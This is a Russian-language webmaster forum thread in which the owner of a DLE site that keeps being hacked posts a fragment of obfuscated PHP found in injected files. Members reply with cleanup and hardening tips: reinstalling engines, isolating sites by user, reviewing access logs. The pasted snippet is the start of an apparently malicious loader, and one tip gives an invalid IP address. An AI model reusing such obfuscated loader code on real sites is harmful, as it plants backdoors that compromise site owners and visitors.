Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Взломали сайт на dle

Тема в разделе "Вопросы- ответы", создана пользователем baykanur, 1 авг 2017.

01.08.17 в 11:01
01.08.17 в 17:42
17
1.065
0
  1. TopicStarter Overlay
    baykanur

    Команда форума VIP Кинотрафик v2

    Регистрация:
    5 фев 2017
    Сообщения:
    51
    Лучших ответов:
    0
    Рейтинги:
    +8 / 2 / -0
    Добрый день, посоветуйте специалиста, который может закрыть дыры на сайте, установил последнею версию DLE 11.3 и все равно ломают сайт, может взлом происходит через другие сайты на хостинге. Может кто-то сталкивался в корневой папке появляются левые файлы, в которых такой код

    Код:
    <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['ece9cf2'] = "\x3f\x53\x74\x5d\x7d\x3c\x70\x48\x40\x64\x57\x5c\x4a\x33\x6c\x71\xa\x76\x7a\x58\x77\x7e\x2b\x37\x72\xd\x66\x2f\x60\x59\x31\x65\x2c\x6f\x39\x28\x3a\x5b\x9\x4c\x2a\x5f\x22\x68\x25\x38\x78\x61\x67\x3b\x51\x6b\x6a\x27\x62\x35\x4b\x21\x55\x3d\x50\x42\x36\x29\x24\x63\x4d\x56\x30\x2d\x69\x32\x2e\x7b\x34\x49\x6d\x43\x79\x7c\x52\x23\x26\x20\x46\x75\x6e\x47\x5e\x45\x54\x4e\x41\x3e\x4f\x44\x73\x5a";
    $GLOBALS[$GLOBALS['ece9cf2'][76].$GLOBALS['ece9cf2'][71].$GLOBALS['ece9cf2'][30].$GLOBALS['ece9cf2'][65]] = $GLOBALS['ece9cf2'][65].$GLOBALS['ece9cf2'][43].$GLOBALS['ece9cf2'][24];
    
    Посоветуйте специалиста, который может решить проблему.
     
  2. ZULI

    ZULI Бывалый

    Регистрация:
    16 ноя 2016
    Сообщения:
    923
    Лучших ответов:
    1
    Рейтинги:
    +247 / 30 / -0
    Прикольно, давно такого не видел. В теории на хостинге каждый юзер изолированный, но это в теории. Если уверен что не через дыры в DLE или модулях то пиши хостеру.
     
  3. TopicStarter Overlay
    baykanur

    Команда форума VIP Кинотрафик v2

    Регистрация:
    5 фев 2017
    Сообщения:
    51
    Лучших ответов:
    0
    Рейтинги:
    +8 / 2 / -0
    Дело в том, что сайты были у другого хостера и я перенес этот сайт на другой хостинг и поменял движок с WP на DLE но, что-то не помогло и они все равно как-то взламывают сайт.
     
  4. wake!up

    PRO Users

    Регистрация:
    25 апр 2016
    Сообщения:
    1.490
    Лучших ответов:
    1
    Рейтинги:
    +787 / 24 / -0
  5. ZULI

    ZULI Бывалый

    Регистрация:
    16 ноя 2016
    Сообщения:
    923
    Лучших ответов:
    1
    Рейтинги:
    +247 / 30 / -0
    Загадки только увеличиваются. На старом хостере такое было?

    Когда переносил сайты WP -> DLE в теории все затирается кроме постеров, а база конертируется. Если в самих постерах нет скрипта с бэкдором маскирующегося под картинку.
     
  6. europa1988

    europa1988 Бывалый

    Регистрация:
    24 фев 2016
    Сообщения:
    613
    Лучших ответов:
    2
    Рейтинги:
    +113 / 11 / -0
    была такая фигня, сразу на всех сайтах и скрипта понасрало левого кода, пришлось все сносить и ставить заново
     
  7. TopicStarter Overlay
    baykanur

    Команда форума VIP Кинотрафик v2

    Регистрация:
    5 фев 2017
    Сообщения:
    51
    Лучших ответов:
    0
    Рейтинги:
    +8 / 2 / -0
    Я сделал тоже самое и плюс еще поменял движок, но опять через что-то залезли. А вы поняли в чем была причина и откуда залезли ?
     
  8. europa1988

    europa1988 Бывалый

    Регистрация:
    24 фев 2016
    Сообщения:
    613
    Лучших ответов:
    2
    Рейтинги:
    +113 / 11 / -0
    проблема в других скриптах на хосте, перезаливай другие движки тоже
     
  9. TopicStarter Overlay
    baykanur

    Команда форума VIP Кинотрафик v2

    Регистрация:
    5 фев 2017
    Сообщения:
    51
    Лучших ответов:
    0
    Рейтинги:
    +8 / 2 / -0
    Перезалил, везде стоят последние версии движков. Хотя есть пару сайтов на 11.2, через них могли взломать ?
     
  10. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.946
    Лучших ответов:
    6
    Рейтинги:
    +1.994 / 141 / -0
    поменяй права чтоб файлы можно было закачивать и редактировать от root.
    но я бы на твоем месте поменял бы весь движок, закачиваешь сайт на любой хот,в файле хост hosts прописываешь временный ip адрес 999.000.000. www.сайт.ru сайт.ru и меняешь все, устанавливаешь новый движок и все модули,от старого только база. а потом ставь два антивируса один родной 2017-08-01_11-54-31.png другой этот megadle.ru/mods/56-zeos-antivirus.html

    если есть панель - создай разных пользователей 2017-08-01_12-03-03.png каждый пользователь на сайт, так получится разные директории,каждый сайт отдельно, если один взломают то другому не смогут навредить
     
    #10 Romantv, 1 авг 2017
    Последнее редактирование модератором: 2 авг 2017
    • Нравится Нравится x 2
  11. europa1988

    europa1988 Бывалый

    Регистрация:
    24 фев 2016
    Сообщения:
    613
    Лучших ответов:
    2
    Рейтинги:
    +113 / 11 / -0
    у меня от 1 сайта заразилось еще 5 сайтов, во всех движках был код, пока все не снес и не поставил заново ничего не помогало, находил этот код, удалял, все равно прописывался во все движки, не знаю, мне помогло только снос и чистая установка, может быть совет Romantv тебе поможет
     
  12. PunPun

    VIP Кинотрафик v2

    Регистрация:
    11 июн 2015
    Сообщения:
    7.434
    Лучших ответов:
    32
    Рейтинги:
    +4.062 / 137 / -0
    Никакие "антивирусы" для php вам не помогут. Это как антивирус для линукса.
     
    • Нравится Нравится x 1
  13. europa1988

    europa1988 Бывалый

    Регистрация:
    24 фев 2016
    Сообщения:
    613
    Лучших ответов:
    2
    Рейтинги:
    +113 / 11 / -0
    просто в нете много всякого кто предлогает раскрутку, я повелся на раскрутку, прописал код который требовался и после этого начались редиректы на другие ГСы, после просмотра логов, и поиска по Гуглу оказалось что они разводили лохов и тем самым крутили свои сайты, я знаю что есть много разных способов защиты, но не стал читать и вдумываться, просто снес все и заново поставил, базы есть, картинки есть, что еще нужно?! модули можно и заново поставить

    в этом случае согласен, но вот если от sql инъекции антивир может помочь IMHO
     
    #13 europa1988, 1 авг 2017
    Последнее редактирование модератором: 2 авг 2017
  14. PunPun

    VIP Кинотрафик v2

    Регистрация:
    11 июн 2015
    Сообщения:
    7.434
    Лучших ответов:
    32
    Рейтинги:
    +4.062 / 137 / -0
    europa1988 интересно как тебе антивирус исправит ошибку в коде? Что за дичь ты написал?
     
  15. europa1988

    europa1988 Бывалый

    Регистрация:
    24 фев 2016
    Сообщения:
    613
    Лучших ответов:
    2
    Рейтинги:
    +113 / 11 / -0
    В каком бл коде? про sql написал, причем здесь код?
     
  16. PunPun

    VIP Кинотрафик v2

    Регистрация:
    11 июн 2015
    Сообщения:
    7.434
    Лучших ответов:
    32
    Рейтинги:
    +4.062 / 137 / -0
    europa1988 sql инъекция делается посредством POST / GET запроса на сервер. SQL инъекция это не достаточная фильтрация данных и не верный код в составленном запросе. Почитай об этом прежде чем писать бред.

     
    • Нравится Нравится x 1
  17. Eugeny

    Команда форума VIP Кинотрафик v2

    Регистрация:
    3 май 2016
    Сообщения:
    176
    Лучших ответов:
    0
    Рейтинги:
    +39 / 0 / -0
    Можно посмотреть лог обращений к файлам, так определить к каким php файлам был напрямую доступ и смотреть их
     
  18. PunPun

    VIP Кинотрафик v2

    Регистрация:
    11 июн 2015
    Сообщения:
    7.434
    Лучших ответов:
    32
    Рейтинги:
    +4.062 / 137 / -0
    Eugeny для этого можно скрипт написать, на том же php для мониторинга, а сами файлы только под root.
     
Похожие темы
  1. Khumoyun
    Ответов:
    11
    Просмотров:
    3.834
  2. uskino
    Ответов:
    7
    Просмотров:
    854
  3. Romantv
    Ответов:
    36
    Просмотров:
    2.377
  4. uskino
    Ответов:
    6
    Просмотров:
    620
  5. Lover
    Ответов:
    9
    Просмотров:
    1.581
Загрузка...
Яндекс.Метрика